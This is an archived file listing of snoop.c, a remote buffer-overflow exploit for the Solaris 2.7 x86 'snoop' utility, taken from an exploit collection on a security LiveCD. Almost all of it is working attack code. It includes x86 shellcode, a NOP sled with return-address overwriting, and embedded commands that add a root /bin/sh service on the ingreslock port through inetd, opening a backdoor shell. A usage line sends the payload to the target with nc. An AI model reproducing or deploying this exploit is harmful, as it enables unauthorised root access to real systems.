Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / snoop.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 1KB | 53 lines

/* Remote Solaris 2.7 x86 snoop exploit by cheez Run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop -v" Thanks str/horizon for shellcodes (hi plaguez) */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;" "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;" "/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 char buffer[SIZE]; const char x86_nop=0x90; long nop=NOPDEF, esp=0x8047344, offset=DEFOFF; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) *((int *) &buffer[i]) = esp+offset; fprintf(stderr,"0x%x\n", esp+offset); printf("%s", buffer); return 0; } /* www.hack.co.za [2000]*/